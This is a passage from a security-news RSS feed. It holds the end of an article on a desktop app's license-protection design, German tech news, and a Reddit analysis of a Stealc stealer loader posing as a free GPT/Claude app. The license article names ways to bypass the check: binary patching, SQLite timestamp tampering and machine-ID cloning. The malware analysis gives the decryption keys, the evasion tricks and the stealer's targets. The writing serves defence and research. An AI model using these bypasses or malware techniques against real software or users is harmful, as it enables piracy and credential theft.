▼<br>LicenseManager.verify_and_activate(api_key)<br>  → POST https://dotsuite-core-production.up.railway.app/v1/license/activate<br>     Authorization: Bearer &lt;api_key&gt;<br>     Body: { "machine_id": "a3f1b2..." }<br>        │<br>        ▼<br>Server validates key, checks activation count (≤ 2 machines), signs token<br>Returns: { "license_token": "&lt;payload&gt;.&lt;sig&gt;", "name": "FreeRave" }<br>        │<br>        ▼<br>Client: _verify_token(token)<br>  → Signature valid (Ed25519)<br>  → Not expired (exp &gt; time.time())<br>  → Machine matches (mid == generate_machine_id())<br>        │<br>        ▼<br>Token + API key saved to SQLite<br>Background recheck thread started (24h cycle)</pre><h4>The Local HTTP Server as a Security Boundary</h4><p>The browser-to-desktop callback is not a direct function call — it goes through a local HTTP server. This is not over-engineering. The HTTP boundary enforces:</p><ol><li><strong>CSRF protection:</strong> The state token is generated fresh on each activation attempt and compared using secrets.compare_digest() (constant-time, timing-attack resistant). Any page other than the DotSuite dashboard that tries to POST to the local server will fail state verification.</li><li><strong>Payload size cap:</strong> The server rejects any POST body over 4096 bytes with HTTP 413. An API key is at most a few hundred bytes — there’s no legitimate reason for a larger payload.</li><li><strong>Port 0 binding:</strong> Binding to port 0 lets the OS assign an available ephemeral port atomically. The alternative — picking a fixed port and checking if it’s free — is a TOCTOU race condition. Port 0 eliminates the race.</li></ol><pre># Constant-time comparison — prevents timing oracle on state token<br>def verify_state(self, state):<br>    if not state or not self.state_token:<br>        return False<br>    return secrets.compare_digest(state, self.state_token)</pre><p>secrets.compare_digest() matters here because the comparison happens over localhost HTTP. A timing oracle on a 32-character token over loopback is a marginal attack in practice, but it costs nothing to use the correct primitive.</p><h3>Offline Grace and Startup Verification</h3><p>After activation, the token is cached in SQLite. Every subsequent startup re-verifies locally — no network call required:</p><pre>def __init__(self, db_manager):<br>    # ...<br>    if self._license_token:<br>        last_verified = float(<br>            self.db_manager.get_setting("last_license_check_time", 0.0)<br>        )<br>        current_time = time.time()<br><br># Clock rollback detection<br>        # If current_time &lt; last_verified, the clock was moved backward<br>        # This could be used to prevent token expiry - reject it<br>        if current_time &lt; last_verified:<br>            self.logger.error("System clock rollback detected on startup!")<br>            self._clear_local()<br>        else:<br>            valid, _ = self._verify_token(self._license_token)<br>            if valid:<br>                self._is_max = True<br>                self.db_manager.save_setting(<br>                    "last_license_check_time", current_time, "license"<br>                )<br>                self._schedule_background_recheck()<br>            else:<br>                self._clear_local()</pre><p><strong>Clock rollback attack:</strong> If a user manually sets their system clock backward, time.time() returns a value earlier than the stored last_license_check_time. The check current_time &lt; last_verified detects this and immediately deactivates. The stored timestamp acts as a ratchet — it can only move forward.</p><p><strong>The 7-day grace period</strong> is implicit in the token’s exp field. The server sets expiry 7 days from activation (or last successful recheck). An offline machine can use the software freely for 7 days before the token expires and the local check fails.</p><h3>Background Revocation Detection</h3><p>Local verification is fast and works offline, but it cannot detect revoked keys. A key that was refunded, chargebacked, or administratively revoked would continue to pass local Ed25519 verification until its token expires.</p><p>The background recheck thread addresses this:</p><pre>def _schedule_background_recheck(self):<br>    self.stop_recheck_event.clear()<br>    t = threading.Thread(<br>        target=self._recheck_loop,<br>        daemon=True,           # dies with the main process<br>        name="license-recheck"<br>    )<br>    t.start()<br><br>def _recheck_loop(self):<br>    while not self.stop_recheck_event.is_set():<br>        # Event.wait(timeout) instead of time.sleep():<br>        # wakes immediately on stop_recheck_event.set(), enabling clean shutdown<br>        is_stopped = self.stop_recheck_event.wait(_RECHECK_HOURS * 3600)<br>        if is_stopped or self.stop_recheck_event.is_set():<br>            break<br>        self._silent_recheck()</pre><p>The recheck itself is silent — no UI notification, no interruption:</p><pre>def _silent_recheck(self):<br>    with self.lock:<br>        if not self._is_max:<br>            return<br>        current_key = self._api_key<br>    try:<br>        machine_id    = self.generate_machine_id()<br>        payload_bytes = json.dumps({"machine_id": machine_id}).encode()<br>        req = urllib.request.Request(<br>            _RECHECK_URL, data=payload_bytes,<br>            headers={<br>                "Authorization": f"Bearer {current_key}",<br>                "Content-Type": "application/json"<br>            }<br>        )<br>        with urllib.request.urlopen(req, timeout=10) as resp:<br>            data      = json.loads(resp.read().decode())<br>            new_token = data.get("license_token", "")<br><br>valid, _ = self._verify_token(new_token)<br>        if valid:<br>            with self.lock:<br>                self._license_token = new_token<br>            self.db_manager.save_setting("license_token", new_token, "license")<br>            self.db_manager.save_setting(<br>                "last_license_check_time", time.time(), "license"<br>            )<br>        else:<br>            self._clear_local()   # Server returned invalid token - deactivate<br>    except urllib.error.HTTPError as e:<br>        if e.code in (401, 403, 404):<br>            self._clear_local()   # Explicit server rejection - deactivate immediately<br>        # 5xx, connection timeout: server down or network unavailable<br>        # Do NOT deactivate - user gets full 7-day grace period<br>    except Exception:<br>        pass   # Any other error: fail open, try again next cycle</pre><p>The error handling is the most important part of this function. Three distinct outcomes:</p><p><strong>HTTP 401/403/404</strong> — the server explicitly rejected the request. The API key is invalid, revoked, or deleted. Deactivate immediately, clear all local credentials.</p><p><strong>HTTP 5xx / connection error / timeout</strong> — the server is temporarily unavailable. Do nothing. The local token is still valid (Ed25519 + expiry check passed on startup). The user retains full access for the remainder of the token’s TTL. This is the correct behaviour: a server outage should never disrupt legitimate users.</p><p><strong>Valid fresh token returned</strong> — refresh the cache. The new token extends the TTL another 7 days, so an online user’s activation effectively never expires.</p><h3>The Feature Gate</h3><p>Every Pro-only code path in the UI calls one property:</p><pre>@property<br>def is_max_activated(self) -&gt; bool:<br>    # In-memory boolean — no I/O, no crypto<br>    with self.lock:<br>        return self._is_max</pre><p>This is intentionally the simplest possible check. The reasoning is performance: is_max_activated is evaluated on every frame of the real-time preview slider. Token verification using Ed25519 takes 0.5–2ms per call. At 60fps, continuous verification would consume up to 120ms/second on crypto alone — enough to cause visible frame drops.</p><p>The expensive verification happens once on startup and once per 24-hour background cycle. The in-memory boolean is the hot path, protected by a standard mutex for thread safety (the background recheck thread writes to _is_max from a different thread).</p><p>Feature gating at detection mode selection:</p><pre>def on_detection_change(self):<br>    mode = self.detection_mode.get()<br>    pro_only_modes = ['target_text', 'text', 'body', 'license_plate']<br><br>if mode in pro_only_modes and not self.license_manager.is_max_activated:<br>        QMessageBox.information(<br>            self, "Pro Feature",<br>            f"'{mode.replace('_', ' ').title()}' detection requires DotScramble Pro."<br>        )<br>        self.detection_mode.set("face")  # Reset to free tier default</pre><p>Feature gating at save time:</p><pre>is_max       = self.license_manager.is_max_activated<br>should_scrub = is_max and self.scrub_exif.get()<br>should_spoof = is_max and self.spoof_metadata.get() and not should_scrub</pre><p>Metadata operations (EXIF spoofing, scrubbing) are Pro-only features. The gate is evaluated at save time, not at button click — preventing race conditions where the UI state and license state could diverge.</p><h3>Source Protection via Cython</h3><p>Python source is trivially patchable. Given _is_max:</p><pre># Original<br>return self._is_max<br><br># Patched in 3 seconds<br>return True</pre><p>Mitigation: compile license_manager.py to a native shared library using Cython. The build script:</p><pre>from setuptools import setup, Extension<br>from Cython.Build import cythonize<br><br>extensions = [<br>    Extension(<br>        "src.managers.license_manager",<br>        sources=["src/managers/license_manager.py"],<br>        extra_compile_args=["-O2"],<br>    )<br>]<br>setup(<br>    name="dotscramble_license",<br>    ext_modules=cythonize(<br>        extensions,<br>        compiler_directives={<br>            "embedsignature":      False,  # Strip readable function signatures<br>            "emit_code_comments":  False,  # No source hints in binary<br>            "language_level":      "3",<br>            "boundscheck":         False,<br>            "wraparound":          True,<br>        },<br>    ),<br>)</pre><p>Build:</p><pre>python setup_license.py build_ext --inplace<br># → src/managers/license_manager.cpython-313-x86_64-linux-gnu.so</pre><p>The original .py is removed from the distribution. Python's import system finds the .so automatically — no import path changes required.</p><p>The compiled binary is a real ELF shared library. Patching it requires disassembling x86_64 machine code, locating the boolean return instruction in the JIT-compiled method, and modifying it in a hex editor or with a binary patcher. This is not impossible, but the skill floor is substantially higher than editing a Python file. Combined with the Ed25519 enforcement — which cannot be bypassed by patching the client — the effort/reward ratio for cracking exceeds the cost of a legitimate license for most users.</p><blockquote><strong><em>Platform note:</em></strong><em> Cython produces platform-specific binaries. </em><em>cpython-313-x86_64-linux-gnu.so runs only on Linux x86_64 with CPython 3.13. Cross-platform distribution requires separate build steps on Linux, Windows, and macOS — standard practice for any CI pipeline with multi-platform targets.</em></blockquote><h3>Known Limitations and Attack Surfaces</h3><p><strong>The public key is in the binary.</strong> This is by design — the public key is <em>meant</em> to be public. It cannot be used to forge tokens. An attacker who extracts it gains nothing.</p><p><strong>Container and VM bypass.</strong> In environments where /etc/machine-id can be freely set (Docker, LXC, VMs with snapshot/rollback), the machine fingerprint can be cloned. Mitigation: the server-side 2-machine activation limit constrains this — each cloned ID counts as a new activation.</p><p><strong>Binary patching still possible.</strong> Cython raises the bar but doesn’t eliminate it. A sufficiently motivated attacker with a disassembler can still find and patch the boolean return in the .so. The actual security comes from Ed25519 — even a patched client that claims is_max = True can't forge a valid token, so server-enforced features (recheck, machine limit) remain intact.</p><p><strong>Clock rollback detection has a window.</strong> The check compares time.time() against a stored SQLite timestamp. An attacker who modifies the SQLite database <em>before</em> running the app could plant a fake last_license_check_time far in the future, then roll the clock back while keeping time.time() &gt; stored_time. Mitigation: the SQLite database is in the user's home directory and not encrypted — for high-value deployments, a tamper-evident store (e.g. macOS Keychain, Linux Secret Service) would be more appropriate.</p><p><strong>No mutual TLS.</strong> The /v1/license/activate and /v1/license/recheck calls use standard HTTPS. The server's certificate is verified by the system CA store. A machine with a compromised CA store (corporate MITM proxy, malware-installed root) could intercept and modify these responses. This is a general HTTPS limitation, not specific to this design.</p><h3>Design Decisions — What Was Intentionally Excluded</h3><p><strong>Online-only enforcement.</strong> Requiring a network check on every launch would break offline use. Planes, hotel Wi-Fi captive portals, corporate proxies, server downtime — all of these would result in failed launches for paying customers. The 7-day grace period with background recheck is the correct trade-off.</p><p><strong>Aggressive telemetry.</strong> The only data sent to the server is the machine ID and API key. No usage statistics, no feature telemetry, no file names, no behavioral data. DotScramble is a privacy tool. Telemetry would be self-contradicting.</p><p><strong>Obfuscating the public key.</strong> Pointless security theatre. The public key is designed to be known. Wrapping it in XOR or base64-of-base64 adds no security and significant code smell.</p><p><strong>Binding to MAC address only.</strong> MAC addresses are trivially spoofed on Linux (ip link set dev eth0 address XX:XX:XX:XX:XX:XX) and may be randomized by default. Using /etc/machine-id as the primary anchor is more stable and harder to spoof without root access.</p><h3>Summary</h3><p>DotScramble’s license system implements a minimal but sound cryptographic design:</p><ul><li><strong>Ed25519 asymmetric signing</strong> ensures tokens cannot be forged without the server’s private key, regardless of how thoroughly the client binary is reversed.</li><li><strong>Weighted machine fingerprinting</strong> using OS-level hardware identifiers provides stable, cross-platform machine binding that survives network changes and VPN usage.</li><li><strong>SQLite-cached token with startup re-verification</strong> enables offline use without any network dependency on launch.</li><li><strong>7-day TTL with 24-hour background recheck</strong> gives legitimate offline users a comfortable grace window while ensuring revoked keys are detected within a day of the machine coming online.</li><li><strong>Cython compilation</strong> raises the practical bar against source patching, complementing but not replacing the cryptographic enforcement.</li></ul><p>The design is appropriate for a solo-developed privacy tool. It is not appropriate for enterprise software protecting high-value IP — that use case warrants hardware dongles, TPM attestation, or a full code-signing/attestation pipeline.</p><p><strong>GitHub:</strong> <a href="https://github.com/kareem2099/DotScramble">github.com/kareem2099/DotScramble</a><br><strong>OpenDesktop:</strong> <a href="https://www.opendesktop.org/p/2362477/">opendesktop.org/p/2362477</a><br><strong>License:</strong> Apache 2.0</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=d8dd5678e1cb" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/asymmetric-signing-machine-fingerprinting-and-offline-grace-periods-building-a-license-system-d8dd5678e1cb">Asymmetric Signing, Machine Fingerprinting, and Offline Grace Periods: Building a License System…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | Honor Magic V6: Power-Foldable mit Mega-Akku im Test]]></title>
<description><![CDATA[Das Honor Magic V6 ist beeindruckend flach und trotzdem stark und ausdauernd. Im Test erlaubt es sich kaum Schwächen.]]></description>
<link>https://tsecurity.de/de/3638115/it-nachrichten/heise-honor-magic-v6-power-foldable-mit-mega-akku-im-test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638115/it-nachrichten/heise-honor-magic-v6-power-foldable-mit-mega-akku-im-test/</guid>
<pubDate>Wed, 01 Jul 2026 12:16:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Honor Magic V6 ist beeindruckend flach und trotzdem stark und ausdauernd. Im Test erlaubt es sich kaum Schwächen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor Magic V6 im Test: Ein Falt-Handy ohne Schwächen?]]></title>
<description><![CDATA[Honor hat mit seinen Falt-Handys manchen Trend vorweggenommen – und Samsung Dampf gemacht. Gelingt das auch dem Honor Magic V6? Der Test.]]></description>
<link>https://tsecurity.de/de/3637815/it-nachrichten/honor-magic-v6-im-test-ein-falt-handy-ohne-schwaechen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637815/it-nachrichten/honor-magic-v6-im-test-ein-falt-handy-ohne-schwaechen/</guid>
<pubDate>Wed, 01 Jul 2026 10:18:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Honor hat mit seinen Falt-Handys manchen Trend vorweggenommen – und Samsung Dampf gemacht. Gelingt das auch dem Honor Magic V6? Der Test.]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung-Brille gesichtet: App enthüllt erste Galaxy Glasses mit Google Gemini]]></title>
<description><![CDATA[Samsung macht mal wieder den Anfang im Android-Universum und wird bei den neuen Gemini-Brillen der erste Google-Partner mit einem Gerät sein. Nun gib es einen…
Dieser Artikel Samsung-Brille gesichtet: App enthüllt erste Galaxy Glasses mit Google Gemini erschien zuerst auf SmartDroid.de.]]></description>
<link>https://tsecurity.de/de/3637803/android-tipps/samsung-brille-gesichtet-app-enthuellt-erste-galaxy-glasses-mit-google-gemini/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637803/android-tipps/samsung-brille-gesichtet-app-enthuellt-erste-galaxy-glasses-mit-google-gemini/</guid>
<pubDate>Wed, 01 Jul 2026 10:11:10 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1678" height="934" src="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2025/10/Android-XR-Brille-Magic-Leap-3.jpg?fit=1678%2C934&amp;ssl=1" class="attachment-medium size-medium wp-post-image" alt="Android XR Brille Magic Leap 3" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2025/10/Android-XR-Brille-Magic-Leap-3.jpg?w=1678&amp;ssl=1 1678w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2025/10/Android-XR-Brille-Magic-Leap-3.jpg?resize=1200%2C668&amp;ssl=1 1200w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2025/10/Android-XR-Brille-Magic-Leap-3.jpg?resize=1536%2C855&amp;ssl=1 1536w" sizes="(max-width: 1678px) 100vw, 1678px"><p>Samsung macht mal wieder den Anfang im Android-Universum und wird bei den neuen Gemini-Brillen der erste Google-Partner mit einem Gerät sein. Nun gib es einen…</p>
<p>Dieser Artikel <a rel="nofollow" href="https://www.smartdroid.de/samsung-uhr-gesichtet-app-enthuellt-erste-galaxy-glasses-mit-google-gemini/">Samsung-Brille gesichtet: App enthüllt erste Galaxy Glasses mit Google Gemini</a> erschien zuerst auf <a rel="nofollow" href="https://www.smartdroid.de/">SmartDroid.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Analysis of a new Stealc loader disguised as a fake "GPT/Claude Free" app]]></title>
<description><![CDATA[Just spent the last few hours reversing a sample that's being distributed as a fake offline Claude / GPT desktop client. The binary I got was named GPT_Claude_Free.exe (though it also bundles a Russian video editor decoy to keep up the facade). Under the hood, it's a 3-stage custom crypter delive...]]></description>
<link>https://tsecurity.de/de/3637213/malware-trojaner-viren/analysis-of-a-new-stealc-loader-disguised-as-a-fake-gptclaude-free-app/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3637213/malware-trojaner-viren/analysis-of-a-new-stealc-loader-disguised-as-a-fake-gptclaude-free-app/</guid>
<pubDate>Wed, 01 Jul 2026 03:47:29 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Just spent the last few hours reversing a sample that's being distributed as a fake offline Claude / GPT desktop client. The binary I got was named <code>GPT_Claude_Free.exe</code> (though it also bundles a Russian video editor decoy to keep up the facade).</p> <p>Under the hood, it's a 3-stage custom crypter delivering a Stealc v2 payload. Here's a quick dump of how the packer works and what the payload is doing.</p> <p><strong>Reversing the loader:</strong> First thing it does is run through a bunch of anti-analysis checks. It calls <code>IsDebuggerPresent</code>, checks <code>NtGlobalFlag</code> manually from the PEB (via <code>gs:[0x60]</code>), and queries registry keys for VM stuff (VMware/VirtualBox). There's also a timing loop that spins a custom LCG generator 100k times to mess with basic dynamic analysis.</p> <p>If it passes, it moves to the decryption logic. The payload is tucked away in the <code>.xdata</code> section. It's stored entirely as printable ASCII. It runs through three distinct phases:</p> <ol> <li><strong>Base85 decode:</strong> It uses a custom alphabet translation table at offset <code>0x4073A0</code> (in <code>.rdata</code>).</li> <li><strong>Rolling XOR:</strong> Decrypted stream is XOR'd with a 32-byte key at <code>0x406040</code> (<code>72d57da187da5de93942e1ae1b9dcf20ee2a00f5ff979cb7d5e1a8e79a46584c</code>).</li> <li><strong>AES-256-CBC:</strong> The key is at <code>0x406010</code> (<code>f20daa63a36905e004390c7fc79c79dc73a290b3330868fdad63cbe16a7974d3</code>) and the IV is at <code>0x406030</code> (<code>4e6279de852509f8ce25c6357718ccd2</code>).</li> </ol> <p>Once it has the clean MZ PE in memory, it doesn't write anything to disk. It just performs process hollowing (standard <code>NtAllocateVirtualMemory</code> / relocation adjustments) to inject it directly.</p> <p><strong>Reversing the payload:</strong> The decrypted binary is Stealc v2. If you look at the configuration block (stored inside the <code>.stgcfg</code> section starting with 'CGTS' magic bytes), it's set up to steal basically everything:</p> <ul> <li><strong>Browsers:</strong> Targets credentials, autofill, credit cards, and session cookies from ~30 Chrome/Firefox derivatives.</li> <li><strong>Wallets:</strong> Grabs MetaMask/TokenPocket extension folders and desktop wallet files (Exodus, Electrum, Monero, Coinomi).</li> <li><strong>Tokens:</strong> Scans Local Storage folders for Discord tokens and grabs Telegram <code>tdata</code> directories.</li> <li><strong>Gaming/VPN:</strong> Steam, <a href="http://battle.net/">Battle.net</a>, GOG, WinSCP, FileZilla, and OpenVPN configurations.</li> <li><strong>Recon:</strong> Captures clipboard &amp; screenshots.</li> </ul> <p>It exfiltrates everything via POST requests to the C2 using HTTP headers like <code>X-Gate-Token</code> and <code>X-Build-ID</code>.</p> <p>Decrypted payload hash for anyone who wants to write rules or pivot: <code>1f498b81fd767687f72605e18628fb6b6ba40035325fb6618d519ae88d7a27c2</code></p> <p>Let me know if you run into this family or if you want me to share the decompiled extraction script.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Wrong-Quantity6957"> /u/Wrong-Quantity6957 </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uil0eo/analysis_of_a_new_stealc_loader_disguised_as_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1uil0eo/analysis_of_a_new_stealc_loader_disguised_as_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[I tested it, and Astell & Kern’s new pocketable smartphone DAC is a clear winner for detail, marred just slightly by bantamweight bass]]></title>
<description><![CDATA[Astell & Kern realises we can’t all afford one of its lovely digital audio players. So it’s trying to bring a little of the A&K magic to your humble smartphone…]]></description>
<link>https://tsecurity.de/de/3636918/it-nachrichten/i-tested-it-and-astell-kerns-new-pocketable-smartphone-dac-is-a-clear-winner-for-detail-marred-just-slightly-by-bantamweight-bass/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636918/it-nachrichten/i-tested-it-and-astell-kerns-new-pocketable-smartphone-dac-is-a-clear-winner-for-detail-marred-just-slightly-by-bantamweight-bass/</guid>
<pubDate>Tue, 30 Jun 2026 23:32:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Astell &amp; Kern realises we can’t all afford one of its lovely digital audio players. So it’s trying to bring a little of the A&amp;K magic to your humble smartphone…]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix used AI to put Gene Wilder's voice into a new reality show]]></title>
<description><![CDATA[So much for magic.]]></description>
<link>https://tsecurity.de/de/3636814/it-nachrichten/netflix-used-ai-to-put-gene-wilders-voice-into-a-new-reality-show/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636814/it-nachrichten/netflix-used-ai-to-put-gene-wilders-voice-into-a-new-reality-show/</guid>
<pubDate>Tue, 30 Jun 2026 22:32:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[So much for magic.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android: Neue Google-App startet für Pixel-Smartphones – Pixel Audio Services bringt wohl neue Audio-KI]]></title>
<description><![CDATA[Google dürfte rund um die Pixel-Smartphones schon bald wieder etwas stärker nachlegen und macht jetzt den ersten Schritt in Richtung einer neuen Funktionskategorie: Jetzt hat man eine ganz neue Android-App für die Pixel 10-Smartphones veröffentlicht, deren erste Aufgabe wir möglicherweise schon k...]]></description>
<link>https://tsecurity.de/de/3636418/it-nachrichten/android-neue-google-app-startet-fuer-pixel-smartphones-pixel-audio-services-bringt-wohl-neue-audio-ki/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3636418/it-nachrichten/android-neue-google-app-startet-fuer-pixel-smartphones-pixel-audio-services-bringt-wohl-neue-audio-ki/</guid>
<pubDate>Tue, 30 Jun 2026 19:17:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="640" height="363" src="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg" class="attachment-large size-large wp-post-image" alt="pixel 9 magic" decoding="async" fetchpriority="high" srcset="https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-1024x580.jpg 1024w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-300x170.jpg 300w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-768x435.jpg 768w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-640x362.jpg 640w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1-800x453.jpg 800w, https://www.googlewatchblog.de/wp-content/uploads/pixel-9-magic-1.jpg 1500w" sizes="(max-width: 640px) 100vw, 640px"><br>Google dürfte rund um die <a href="https://www.googlewatchblog.de/2026/06/pixel-wm-aktion-jetzt-ein-pixel-10-kaufen-und-google-tv-streamer-pixel-ring-stand-gratis-erhalten-u/"><strong>Pixel-Smartphones</strong></a> schon bald wieder etwas stärker nachlegen und macht jetzt den ersten Schritt in Richtung einer neuen Funktionskategorie: Jetzt hat man eine ganz neue Android-App für die Pixel 10-Smartphones veröffentlicht, deren erste Aufgabe wir möglicherweise schon kennen. Mit den <strong>Pixel Audio Services</strong> will man eine Systemzentrale für Audiomodule bereitstellen.</p>
<p>Mehr lesen: <a href="https://www.googlewatchblog.de/2026/06/android-neue-google-app-startet-fuer-pixel-smartphones-pixel-audio-services-bringt-wohl-neue-audio-ki/">Android: Neue Google-App startet für Pixel-Smartphones – Pixel Audio Services bringt wohl neue Audio-KI</a></p>
<hr>
<p></p><center><a href="https://www.google.com/preferences/source?q=googlewatchblog.de"><img src="https://www.googlewatchblog.de/wp-content/uploads/googlebevorzugt.webp" alt="GoogleWatchBlog als bevorzugte Quelle bei Google hinzufügen" width="284" height="90"></a></center><br><center><strong>Keine Google-News mehr verpassen:</strong> <a href="https://news.google.com/publications/CAAqLggKIihDQklTR0FnTWFoUUtFbWR2YjJkc1pYZGhkR05vWW14dlp5NWtaU2dBUAE?hl=de"><strong>GoogleWatchBlog bei Google News abonnieren</strong></a></center>
<hr>
<p></p><center><a href="https://ssl-vg03.met.vgwort.de/na/62a54909d2a34954b9e174fab219c97a"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/62a54909d2a34954b9e174fab219c97a" width="16" height="16"></a></center>
<p>Der Beitrag <a href="https://www.googlewatchblog.de/2026/06/android-neue-google-app-startet-fuer-pixel-smartphones-pixel-audio-services-bringt-wohl-neue-audio-ki/">Android: Neue Google-App startet für Pixel-Smartphones – Pixel Audio Services bringt wohl neue Audio-KI</a> erschien zuerst auf <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kann Künstliche Intelligenz die Zukunft vorhersagen? | OUTATIME #36]]></title>
<description><![CDATA[Author: Fraunhofer IEM - Bewertung: 0x - Views:11 Die Zukunft vorherzusagen klingt nach Science Fiction. Doch genau daran arbeiten Forschende schon lange, allerdings nicht mit Glaskugeln, sondern mit wissenschaftlichen Methoden. 

In dieser Folge von OUTATIME geht es um die Wissenschaft der Zukun...]]></description>
<link>https://tsecurity.de/de/3634422/videos/kann-kuenstliche-intelligenz-die-zukunft-vorhersagen-outatime-36/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634422/videos/kann-kuenstliche-intelligenz-die-zukunft-vorhersagen-outatime-36/</guid>
<pubDate>Tue, 30 Jun 2026 05:02:21 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Fraunhofer IEM - Bewertung: 0x - Views:11 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/wVUBajfByEY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Die Zukunft vorherzusagen klingt nach Science Fiction. Doch genau daran arbeiten Forschende schon lange, allerdings nicht mit Glaskugeln, sondern mit wissenschaftlichen Methoden. <br />
<br />
In dieser Folge von OUTATIME geht es um die Wissenschaft der Zukunft. Gemeinsam mit Prof. Dr. Katharina Hölzle, Institutsleiterin des Fraunhofer IAO und Expertin für Zukunftsforschung und Technologieplanung, sprechen Tommy Falkowski, der sich bei Zukunftsprognosen lieber nicht zu weit aus dem Fenster lehnt, und Prof. Dr. Roman Dumitrescu, das „Magic 8 Ball“ des Instituts, darüber, wie Unternehmen, Politik und Gesellschaft sich systematisch auf das Morgen vorbereiten können. <br />
<br />
Warum lagen manche Zukunftsprognosen spektakulär daneben, während andere Entwicklungen Jahrzehnte im Voraus erkannt wurden? Welche Rolle spielen Methoden wie Szenariotechnik, Roadmaps oder Delphi Studien? Und kann KI dabei helfen, die Zukunft besser zu verstehen oder ist sie selbst nur ein weiteres Werkzeug? <br />
<br />
Wie blickt ihr auf die Zukunft? Glaubt ihr, dass KI eines Tages verlässlich vorhersagen kann, was morgen passiert? Oder liegt die wahre Stärke darin, verschiedene Zukunftsszenarien zu verstehen und die Zukunft aktiv mitzugestalten? <br />
<br />
Schreibt uns eure Meinung oder Themenvorschläge an outatime@iem.fraunhofer.de oder diskutiert mit uns auf unseren Social Media Kanälen. <br />
<br />
Links zur Folge:<br />
- Symposium für Vorausschau und Technologieplanung (SVT): https://www.svt-tagung.com/<br />
- Prof. Dr. Elke Seefried, Geschichte der Zukunftsforschung: https://archiv.ub.uni-heidelberg.de/volltextserver/22954/<br />
- Tool zur Zukunftssimulation: https://mirofish.homes/<br />
- Club of Rome und die 50 Jahre alte Studie Grenzen des Wachstums: https://clubofrome.de/die-grenzen-des-wachstums/<br />
<br />
Erwähnte Bücher:<br />
- Ray Kurzweil: KI. Das Zeitalter der künstlichen Intelligenz. Hanser Verlag. <br />
- Alvin Toffler: Future Shock. Random House, 1970. <br />
<br />
------------------------------------------------<br />
<br />
🔹 Zu Gast: Katharina Hölzle, Institutsleiterin Fraunhofer IAO<br />
🔗 LinkedIn: https://www.linkedin.com/in/katharinahoelzle/  <br />
 <br />
🔹 Host: Prof. Dr.-Ing. Roman Dumitrescu  <br />
🔗 LinkedIn: https://www.linkedin.com/in/roman-dumitrescu-professor/  <br />
 <br />
🔹 Host: Tommy Falkowski  <br />
🔗 LinkedIn: https://www.linkedin.com/in/tommy-falkowski/ Mehr Infos auf unserer  <br />
<br />
------------------------------------------------<br />
<br />
📌 Jetzt in den Zukunftspodcast reinhören: https://lnk.to/outatime-fraunhofer<br />
<br />
📩 Schreib uns an: outatime@iem.fraunhofer.de oder über Social Media.<br />
<br />
Mehr Insights, Gedankenexperimente und Highlights:<br />
📸 Instagram: https://www.instagram.com/outatime_podcast/<br />
🎵 TikTok: https://www.tiktok.com/@outatime_podcast<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This FOSS project needs some love]]></title>
<description><![CDATA[We all know how Wine and Proton made huge progress. It's incredible how Windows games and programs can run on Linux aswell or even better. Although there are some programs that lack of support. There is something kinda magic for music production, called yabridge that needs developers help. Basica...]]></description>
<link>https://tsecurity.de/de/3634380/linux-tipps/this-foss-project-needs-some-love/</link>
